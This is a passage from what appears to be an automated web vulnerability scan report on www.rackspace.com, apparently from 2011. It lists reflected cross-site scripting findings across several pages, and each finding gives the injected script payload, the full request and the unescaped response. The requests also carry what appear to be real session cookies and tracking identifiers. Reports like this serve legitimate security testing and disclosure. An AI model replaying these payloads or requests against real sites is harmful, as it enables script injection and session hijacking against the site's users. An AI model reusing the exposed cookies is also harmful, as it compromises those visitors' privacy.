4.130. http://www.rackspace.com/forms/contactsalesconfirmation.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/contactsalesconfirmation.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c581"><script>alert(1)</script>4a0f4d57d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.131. http://www.rackspace.com/forms/logorequest.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/logorequest.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cbb"><script>alert(1)</script>68b9e00999b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.132. http://www.rackspace.com/forms/solutionpartnerapplication.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/solutionpartnerapplication.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61bbb"><script>alert(1)</script>18701c3bf88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.133. http://www.rackspace.com/hosting_knowledge/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /hosting_knowledge/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab12f"><script>alert(1)</script>c842bac33c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab12f\"><script>alert(1)</script>c842bac33c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/?ab12f"><script>alert(1)</script>c842bac33c5=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43306"><script>alert(1)</script>9a196529920 was submitted in the REST URL parameter 2. This input was echoed as 43306\"><script>alert(1)</script>9a196529920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/index.php43306"><script>alert(1)</script>9a196529920 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 16:00:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.rackspace.com/hosting_knowledge/xmlrpc.php Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 05 Feb 2011 16:00:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 17:00:07 GMT; path=/; domain=.rackspace.com Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 148266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_knowledge/index.php43306\"><script>alert(1)</script>9a196529920&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return false ...[SNIP]...
4.135. http://www.rackspace.com/hosting_solutions.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/hosting_solutions.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 778f4"><script>alert(1)</script>b266e48b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.136. http://www.rackspace.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2667a"><script>alert(1)</script>060931ff4d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?2667a"><script>alert(1)</script>060931ff4d2=1 HTTP/1.1 Host: www.rackspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the noflash request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93307"><script>alert(1)</script>52822b1d737 was submitted in the noflash parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?noflash=true93307"><script>alert(1)</script>52822b1d737 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?noflash=true93307"><script>alert(1)</script>52822b1d737&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return false ...[SNIP]...
4.138. http://www.rackspace.com/information/aboutus.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/aboutus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><script>alert(1)</script>ea74ab7f6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... p" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.139. http://www.rackspace.com/information/contactus.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/contactus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3623a"><script>alert(1)</script>6457e4ed9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.140. http://www.rackspace.com/information/events/briefingprogram.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/briefingprogram.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31c1"><script>alert(1)</script>3adc45aa57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
